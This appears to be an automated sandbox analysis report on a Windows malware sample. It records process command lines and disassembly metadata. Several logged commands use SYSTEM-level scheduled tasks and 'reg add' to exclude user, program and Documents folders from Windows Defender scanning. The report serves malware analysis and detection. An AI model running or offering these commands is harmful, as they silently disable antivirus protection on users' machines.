                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:22:43:59
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:22:44:00
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Run /TN "Task1"
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff777670000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:22:44:01
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                    Imagebase:0x7ff691ad0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:41
                                                    Start time:22:44:02
                                                    Start date:05/01/2025
                                                    Path:C:\Windows\System32\reg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                    Imagebase:0x7ff7f16f0000
                                                    File size:77'312 bytes
                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:2.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:32.3%
                                                      Total number of Nodes:458
                                                      Total number of Limit Nodes:10

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@
                                                      • API String ID: 0-149943524
                                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: File$CreateReadmalloc
                                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                      • API String ID: 3950102678-3381721293
                                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                      Control-flow Graph [graph rendering not reproduced: function starting at 7ff8ff5d1c00, basic blocks marked Executed / Not Executed, with calls to __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c]
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 190073905-0
                                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                      • Instruction ID: 025312add830061ad33f2e51a38d6e978142aeb35684ac3ebb93706ff0d06924
                                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                      • Instruction Fuzzy Hash: 36816921E0E2434FFB54AB659C422BD2690AF6D7C0F548335EA7C477E6DEACE8458B10

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                      • String ID: WordpadFilter.db
                                                      • API String ID: 868324331-3647581008
                                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                      • Instruction ID: 065d25fe0c8e138fbeba3560210c054f0e804bed63e6c74ac8c69c818f614a15
                                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                      • Instruction Fuzzy Hash: A2315C32B1AB418EF700CFA1D8402AD73A5EB9D788F154635EEAD13B89EE78D591C740

                                                      Control-flow Graph [graph rendering not reproduced: function starting at 7ff8ff5d11b0, basic blocks marked Executed / Not Executed]
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                      • String ID:
                                                      • API String ID: 73155330-0
                                                      • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                      • Instruction ID: 41b28644598ac2c479b277e728c18b0403575c7854245981906d28029574b22f
                                                      • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                      • Instruction Fuzzy Hash: 83810C22A1EB974AFB118B359C40179A694EF6ABD4F148335EEB9577D2DF3CE0918300
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                      • String ID:
                                                      • API String ID: 3526400053-0
                                                      • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                      • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                      • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                      • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                      • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                      • API String ID: 3408796845-4213300970
                                                      • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                      • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                      • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                      • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                      • String ID: ampStopSingletone: logging ended
                                                      • API String ID: 2048888615-3533855269
                                                      • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                      • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                      • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                      • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                      • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                      • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                                      • String ID: /remove$/service$vseamps
                                                      • API String ID: 67513587-3839141145
                                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                      Strings
